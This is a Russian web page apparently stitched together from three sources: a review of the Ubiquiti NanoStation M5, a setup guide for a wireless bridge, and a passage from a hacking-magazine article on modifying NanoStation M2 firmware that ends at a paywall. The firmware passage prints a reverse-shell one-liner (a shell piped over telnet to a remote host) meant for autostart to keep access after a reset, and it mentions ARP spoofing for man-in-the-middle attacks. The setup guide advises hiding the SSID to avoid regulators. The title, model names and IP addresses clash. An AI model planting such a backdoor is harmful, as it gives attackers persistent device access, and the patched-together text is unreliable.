Как подключить и подключить всепогодную точку доступа Ubiquiti NanoStation Loco M2

Прибор под названием NanoStation M5 от Ubiquiti обеспечивает беспроводную передачу данных на большое расстояние.

Мощный процессор и большой объём ОЗУ позволяют использовать эту точку доступа для обслуживания небольшой сети.

Особенности конструкции обеспечивают защиту устройства от внешних воздействий, благодаря чему его устанавливают как внутри помещений, так и на улице.

1.jpg

Техника этой компании позволяет получить удобную и функциональную беспроводную связь, отличаясь сравнительно невысокой стоимостью и простым обслуживанием.

Эта модель представляет собой уже второе поколение популярной серии NanoStation.

И получила такую же универсальность, как и прошлая версия, высокую скорость передачи информации (до 300 Мбит/с) и поддержку протокола AirMAX, обеспечивающего стабильную работу сети.

Содержание: 

post_image-348x290.jpeg

Параметры оборудования

Устройство отличается такими характеристиками:

  • доступной для своих возможностей стоимостью;
  • операционной системой AirOS v5;
  • процессором Atheros MIPS от компании Qualcomm, имеющим частоту 400 МГц;
  • оперативной памятью размером 32 МБ;
  • встроенной флеш-памятью на 8 МБ;
  • двумя разъёмами Ethernet, обеспечивающими скорость передачи данных по проводной сети 10 и 100 Мбит/с;

2.png

Рис. 2. Два порта для Ethernet.

  • пропускной способностью в по беспроводной сети 300 Мбит/с, сравнимой с характеристиками большинства современных Wi-Fi-роутеров;
  • мощным передатчиком мощностью 500 МВт;
  • встроенной двойной антенной типа MIMO, усиливающейсигнал на 14,6–16,1 дБи;
  • подавлением помех между помехами до 22 дБ;
  • параметрами луча: горизонтальной шириной (углом развертки) 43° и вертикальной 41°;
  • питанием от витой пары: 0,8 А, 15В;
  • размером 294х80х30 мм;
  • массой 0,4 кг;
  • рабочим диапазоном температур: от –30 до +80 градусов.

Читайте также:

Как войти в настройки роутера — TP-Link, D-Link, Asus, Zyxel Keenetic, Ростелеком

Что такое роутер в режиме репитера. Как его настроить? Подробное руководство

Как посмотреть пароль от Wi-Fi на компьютере — подробная инструкция

Как посмотреть, кто подключен к моему роутеру wifi?

Преимущества выбора

К плюсам использования именно этой модели можно отнести:

  • стильный и неброский дизайн, который, в совокупности с компактными размерами, способный неплохо вписаться в интерьер любого помещения. А при установке на улице такое оборудование, наоборот, не бросается в глаза;
  • минимальные потери данных при передаче, обеспечиваемые использованием технологии MIMO, двойной поляризацией и высоким уровнем усиления;
  • поддержку стандартов беспроводной связи 802.11a/n/, благодаря которым получается высокая скорость передачи информации, стабильность и дальность;
  • возможность использования NanoStation M5 от бренда Ubiquiti практически в любых условиях, независимо от влаги, солнца, жары и мороза;
  • удалённую перезагрузку устройства.

Точка доступа имеет усиленную защиту от ESD-помех (электростатики), повышающую качество сигнала.

Благодаря питанию с помощью витой пары, устраняется необходимость подведения к месту установки устройства электрокабеля. А наличие собственной операционной системы AirOs у точки доступа позволяет упростить её настройку даже неопытными пользователями. 3.png

Рис. 3. Монтажный блок для установки устройства.

Возможности устройства

С помощью NanoStation M5 можно обеспечить интернет-трафиком абонентов, расположенных на расстоянии до 5–10 км (в зависимости от типа местности и ряда других факторов, усиливающих или ослабляющих сигнал) от точки доступа.

Настройка конфигурации выполняется с помощью интуитивно понятного, несмотря на отсутствие русского языка, и удобного интерфейса.

Подробную инструкцию по наладке, которая не прилагается к прибору, несложно найти и скачать в сети.

4.png

Рис. 4. Интерфейс для изменения настроек точки доступа.

Основными областями применения NanoStation M5 можно назвать:

  • системы телеметрического оборудования;
  • видеонаблюдение;
  • телеконференции.

Важной особенностью конструкции точки доступа является комплектация четырёхсекционной антенной, универсальной и имеющей значительный угол развёртки.

Эти характеристики позволяют настроить прибор на взаимодействие с 3–5 базовыми станциями и большим количеством отдельных устройств.

А, благодаря высокой степени помехоустойчивости, модель способна устанавливаться на столбах и стенах из любых материалов (от железобетона до металла) без заметного снижения качества сигнала.

Ещё одно преимущество NanoStation M5 – изменение ширины канала в пределах 10–40 МГц. Это позволяет выбрать параметры сигнала, делая его сильнее, но уже, или наоборот, повысив пропускную способность, но уменьшив дальность. Как показало тестирование прибора, оптимальное значение показателя составляет 20 МГц.

Читайте также:

Как самостоятельно установить роутер любой модели? TP-Link, Asus, D-Link, ZyXEL и другие

Настройка роутера TP Link TL WR940N. Подробная инструкция

Настройка Роутера Huawei HG8245. [Подробная инструкция]

Программное обеспечение устройства

В качестве программного обеспечения для точки доступа используется 5-я версия платформы AirOS, специально предназначенной для использования на таком оборудовании.

Операционная система работает без перебоев и практически не доставляет неудобств пользователю.

Безопасность обеспечивается поддержкой всех видов шифрования, а небольшие уязвимости платформы, обнаруженные в этой прошивке раньше, уже исправлены.

Одним из приложений встроенной платформы является программа airController, применяющаяся для централизованного управления сетью.

С его помощью контролируется состояние прибора, обновляется программное обеспечение и составляется расписание заданий.

5-3.png

Рис. 5. Приложение airControl.

Использование технологий AirMax и WDS повышает надёжность работы при любых погодных условиях и расстояниях. В то время как возможность подключения к прибору внешней IP-камеры позволяет контролировать обстановку вокруг точки доступа – даже если она не применяется для видеонаблюдения.

NanoStation в качестве роутера

Модель NanoStation M5 может использоваться и в качестве мощного маршрутизатора – сравнительно дорогого, но функционального.

С её помощью легко обеспечить беспроводной сетью офисные помещения общей площадью до 200–300 кв. м.

Пропускная способность канала позволяет распределить потоки между несколькими десятками компьютеров и мобильных гаджетов для выполнения всех рабочих задач.

А отражающийся от ограждающих конструкций сигнал обеспечивает нормальную скорость и качество связи практически в любой точке зоны обслуживания роутера.

6-2.png

Рис. 6. Кабель, вставленный в порт NanoStation M5.

Приобретение устройства позволяет получить серьёзную поддержку своего бизнеса.

Ведь NanoStation M5 подойдёт и провайдеру, обеспечивающий беспроводной сетью небольшой населённый пункт или микрорайон.

Результатом использования именно этой модели станет снижение расходов поставщика услуг Интернета, а, значит, и повышение прибыли.

Устройство является полностью всепогодным, то есть не боится ни осадков, ни температурных перепадов, благодаря использованию следующих элементов:

  • прочного и не имеющего сверху ни одного шва корпуса из стойкого к воздействию ультрафиолета пластика;
  • витой пары, которая обеспечивает питание и проводной Интернет. Кабель подводится снизу и, за счёт защиты специальным кожухом, не подвержен влиянию ни воды, ни влаги;
  • специальной грозозащиты кабеля, позволяющей оборудованию не зависеть от скачков напряжения и статических разрядов.

7-3.png

Рис. 7. Точка доступа на столбе.

Точка доступа работает в широком температурном диапазоне, благодаря чему не требует дополнительного обслуживания даже в достаточно экстремальных условиях.

Например, в холодную отечественную зиму или на протяжении жаркого лета в южных регионах страны.

Питание прибора

Прибор питается с помощью витой пары, длина которой может достигать 50 м. При большем расстоянии будет обеспечиваться только Интернет.

Для питания блока PoE и самой точки доступа требуется 24В и 0,5А. Максимальное значение напряжения и силы тока для работы оборудования – 48В, 1А.

Питание по PoE поддерживается обоими портами. Поэтому не имеет значения, в какой из них воткнута витая пара.

Читайте также:

Как настроить интернет Beline (билайн) на роутерах D-link, TP-link

Запрет контента МТС: что это такое? Управление услугой

Как найти украденный телефон по IMEI?

AnTuTu рейтинг 2017: 10 лучших смартфонов и планшетов июня

Комплектация и стоимость

Коробка, в которой поставляется прибор, содержит:

  • 24-вольтный блок питания;
  • специальные крепления для установки точки доступа на мачте;
  • сертификат соответствия.

8-2.png

Рис. 8. Комплектация точки доступа.

Приобрести устройство на зарубежных сайтах можно за сумму от $70. В отечественных магазинах минимальная стоимость точки доступа составляет 4225 руб.

Средняя цена NanoStation M5 – около 6 тысяч рублей.

8.7РейтингФункциональное добротное устройство

NanoStation M5 от Ubiquiti отличное устройство, которое с легкостью обеспечит беспроводную передачу данных на большое расстояние. Мощный процессор и большой объём ОЗУ позволяют использовать эту точку доступа для обслуживания небольшой локальной или рабочей сети.

Стоимость8Функциональность9Использование9

Комплектация отличается только тем, что в не урезанной версии на одну стяжку больше. А сами антенны отличаются улилением, в младшей версии это 13 dBi, а в старшей 16 dBi.

Приступаем к пошаговой настройке:

1) Обжимаем 4 патчкорда на гигабит. Двухпарка нам не подойдёт, обязательно используем 4х парный кабель. Два шнурочка  можно по 1,8 м, два вторых зависят от расстояния от блока питания до антенны.

etiketka-300x225.jpg

2) Нужно взлянуть на коробку и узнать с какой версией прошивки к нам пришла антенна, а после чего сверить её с последней версией на странице http://www.ubnt.com/download выбрав свою железку. Самое удивительное что файл с прошивкой AirOS везде одинаковый. Увидев что на коробке указана 5.5.3, а на сайте 5.5.6 мы принимаем решение её обновить. Лучше скачать проишвку заранее, т.к. сетевая карта потом будет занята.

2lamp-300x225.jpg3) Подключаемся к компу LAN порт на сетевой карточке -> LAN Port на БП. POE порт на БП — Main порт на антенне. Разумеется не забываем про шнур питания. На время прошивки лучше запитать от сети и компьютер. В знак верного подключения у нас загоряться первые два индикатора. Первый сигнализирует о питании, второй о сетевом подключении до компа. При наличии WiFi адаптера на ноутбуке лучше его отключить.

shag_3-269x300.jpg

4) В свойствах Ethernet подключения прописываем IP 192.168.0.100 и маску 255.255.255.0, остальные поля оставляем пустыми. В случае удачного подключения, в браузере по адресу 192.168.1.20 у вас должна открыться страница приблизительно следующего содержания:

shag_4_2-300x153.jpgИгнорируя предупреждение идём дальше. В поле Username и Password забиваем «ubnt» — это стандартный пароль на всём оборудовании. В качестве страны указываем свою. И в качестве языка — English, т.к прошивка ещё не русифицирована. Соглашаемся с правилами использования чекбоксом «I agree to these terms of use»

И по нажатию на «Login» нас встретит стартовая страница

shag_4_3.jpg

5) Если вам нужно обновить прошивку (пункт Version показывает текущую версию), то заходим на вкладку «System» и в разделе «Firmware update»,в поле «Upload Firmware» указываем путь к скачаной во втором шаге прошивке. После чего кликаем на Upload. После загрузки прошивки появится версия загруженной прошивки, удостоверяемся в её правильности и нажимаем «Update». Появится окно с обновлением прошивки.

После обновления прошивки точка перезагрузится и мы снова можем войти в меню.

Ни в коем случае не отключаем сетевой или кабель питания от сети, в противном случае оборудование придёт в негодность.

6) Для начала сменим данные для авторизации, т.к. кулхацкеры нас могут ожидать повсюду. Для этого заходим на вкладку «System» и в разделе «System Accounts» меняем «Administrator Username» и по нажатию на ключик устанавливаем новый пароль. После чего нажимаем на change.

Не стоит принебрегать этим советом, особенно провайдерам. Интересующиеся люди будут всегда. И проблемы начнутся когда вы их не ждёте.

7) Приступаем к настройкам сети. Сейчас мы настраиваем антенну которая будет давать нам интернет. На вкладке «Network» в случаем с мостом «Network Mode» мы устанавливаем как «Bridge».

Раздел Management Network Settings нам нужен для управления антенной из нашей сети. Что бы нам не пришлось в случае необходимости изменения настроек подключать её к компу напрямую, а зайти на какой то из адресов в вашей сети. Если вы знаете что это такое то можно прописать его ручками, для этого устанавливаем радиокнопку в «Static» и прописываем необходимые параметры (сам адрес, маску подсети, шлюз, dns).

В нашем случае мы будем втыкать антенну в роутер, и пускай она получит от него адрес используя DHCP. Для этого мы меняем положение с «Static» на DHCP. Для сохрания нажимаем на «Change».

8) Далее нам нужно ввести параметры беспроводной сети. Для чего мы зайдём на вкладку «Wireless».

Wireless mode устанавливаем как Access point. В поле SSID вводим имя нашей сети и устанавливаем чекбокс на Hide SSID (скрыть имя сети)

Это в целях вашей же безопасности. Что бы при сканировании сетей вашей не было в списке. Вряд ли у вас есть лицензия на частоты, а дядькам из роскомнадзора это ой как не понравится. Имя тоже лучше придумать не замысловатое.

Если вы начинающий пользователь — то всё остальное можно оставить по дефолту, ну а если чешутся руки, объясню значимость остальных параметров:

Output Power — выходная мощность. Помните, выкручивать её на максимум — не самое умное решение.

Channel Width — ширина канала (занимаемой полосы частот). 40 МГц до 300 Мб/с, 20 МГц до 120 Мб/с, 10 МГц — до 60 Мб/с

Всё остальное начинающим лучше не трогать, в следующих статья я уже распишу всё по пунктам.

shag_8_1.jpg

9) Осталось только все эти настройки применить. Для этого в предупреждении сверху «Configuration contains changes. Apply theese changes?» выбираем Apply. После этого точка перезагрузится с новыми настройками. После чего втыкаем её в роутер и монтируем её по направлению к нашему клиенту.

10) Распаковываем вторую точку и подключаем её также как в третьем шаге. В случае если необходимо обновить прошивку повторяем действия описанные в шаге номер 5 . Меняем пароль в админку, как это описано в шаге номер 6. После чего выезжаем на место монтажа точки, монтируем её и не закрепляя намертво подключаем её к компьютеру и к питанию.

11) На месте входим в админку (не забудьте, стандартный пароль вы должны были сменить) антенны и идём на вкладку Wireless и в поле SSID прописываем имя сети которое мы задали в шаге номер 8. Wireless mode устанавливаем как Station (по умолчанию). Ширину канала (Channel Width) выбираем такую же как и на точке доступа. Нажимаем на кнопку Change, а после этого Apply.

12) Точка должна перезагрузиться. После загрузки в админке на вкладке Main при наличии сигнала от точки шкала сила сигнала «Signal Strength» должна заполнится. Начинаем юстировать антенну.

Внимание! Шкала отображается в dBm, а не в процентах. По этому чем эта цифра меньше — тем лучше.

После юстировки закрепляем точку. На компьютере убираем вручную прописанные адреса и ставим подключение через DHCP.

13) Всё, у нас настроено подключение. Ещё раз напомню, что эта статья является «Быстрым стартом». Тут не учтено много нюансов. Если возникли какие либо вопросы — пишите в коментариях.

NanoStation M2 фирмы Ubiquiti — это всепогодная точка доступа, предназначенная для построения беспроводных мостов на расстояние десять и более километров. Может работать в режиме радиомоста, точки доступа, репитера. В качестве процессора в ней используется чип Atheros AR2315 (MIPS 4KC, 180 МГц). Имеет на борту 32 Мбайт оперативной памяти и 8 Мбайт флеш. То есть это, по сути, мини-компьютер, построенный на архитектуре MIPS, с установленным Linux на борту. А это значит, что можно модифицировать его под свои нужды. Каким образом? Об этом и поговорим.

Зачем оно надо?

Кто-то может с самого начала небезосновательно задать вопрос: а зачем, собственно, ковырять прошивку? Ведь можно взять готовый SDK и собрать свою прошивку с практически любым набором программ. Отвечу. Во-первых, ребята из Ubiquiti свернули программу по распространению SDK, во-вторых, при сборке SDK может возникнуть куча проблем (у меня, например, так и не получилось собрать работоспособную версию кастомной прошивки). Ну и в-третьих, как ни парадоксально, модификация готовой прошивки требует минимум инструментов и времени.

Для чего вообще это все может понадобиться? Для добавления функциональности, не предусмотренной базовой прошивкой. Например, для создания обратных тоннелей. Добавив в автозагрузку вот это:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | telnet remoteip remoteport > /tmp/f

где remoteip — адрес, куда необходимо подключиться, remoteport — удаленный порт, можно получить доступ к устройству даже после сброса или смены логина/пароля. Для добавления всяких сканеров (я успешно добавил knocker, это, конечно, не Nmap, но все же), спуферов (собрав тот же arpspoof, можно реализовать атаку man in the middle, тем более что tcpdump уже имеется в базовой прошивке) и прочих прелестей (например, собрав OpenVPN, можно получить доступ к сети, где стоит наша железка, из любого места). В общем, при желании и наличии фантазии можно сделать из NanoStation M2 отличный инструмент для взлома.

Инструменты

Я проводил все эксперименты на прошивке версии 5.5.4, 6-я версия имеет незначительные отличия, но аналогичным образом можно изменить и ее. Все действия совершались в виртуальной машине, на которой был установлен Arch Linux. Прежде всего для работы нам понадобится binwalk. В Arch’e ставим так: pacman -S binwalk. Также необходим кросс-компилятор для архитектуры MIPS. Тот, который использовал я, можешь взять отсюда. Его нужно распаковать в удобный каталог. У меня он лежит в /root/toolchains/cross-compiler-mips. Ну и собственно сам файл прошивки XM-v5.5.4.build16501.bin. Еще потребуются утилиты для работы со squashfs, а также какой-нибудь hex-редактор. Я использовал hexedit, установить его просто: pacman -S squashfs-tools hexedit. Да, для вычисления контрольных сумм я поставил пакет perl-archive-zip: pacman -S perl-archive-zip, в нем есть скрипт crc32, он и будет нам нужен. Итак, начнем.

Общее строение прошивки

Перед тем как что-то менять, ознакомимся с внутренним устройством прошивки. В общем случае она представляет собой бинарный файл, который состоит из следующих частей:

  1. Ubiquiti firmware header — заголовок прошивки. Содержит строку с версией прошивки.
  2. Ubiquiti partition header — заголовок первого раздела (PARTu-boot). Здесь содержится основная информация о разделе u-boot: размер, адреса памяти для загрузки, максимальный размер и так далее. Стоит отметить, что формат заголовков разделов один и тот же, меняются только значения параметров для соответствующих разделов (имена, размеры, адреса памяти).
  3. Загрузчик u-boot — собственно сам загрузчик.
  4. Ubiquiti partition header — заголовок второго раздела (PARTkernel). Описывает раздел PARTkernel (см. п. 2).
  5. Образ ядра, сжатый алгоритмом LZMA. В основном используется ядро версии 2.6.х.
  6. Ubiquiti partition header — заголовок третьего раздела (PARTrootfs). Описание раздела с файловой системой.
  7. Образ файловой системы squashfs, сжатый алгоритмом LZMA. С этим образом мы и будем работать.
  8. Данные, сжатые gzip. Они нам не понадобятся, поэтому опустим подробности, что они собой представляют.

Базовая информация о строении прошивки была получена отсюда.

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

Вариант 2. Открой один материал

Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.

Я уже участник «Xakep.ru»← Ранее Более 20 моделей роутеров Linksys уязвимы перед атаками и могут стать частью ботнетовДалее → Очередная уязвимость в LastPass позволяла обойти двухфакторную аутентификацию

Используемые источники:

  • http://geek-nose.com/ubiquiti-nanostation-m5/
  • https://zzzepr.ru/most_nanostation_m5/
  • https://xakep.ru/2017/04/24/ubiquiti-nanostation-m2-firmware/

Рейтинг автора
5
Подборку подготовил
Андрей Ульянов
Наш эксперт
Написано статей
168
Ссылка на основную публикацию
Похожие публикации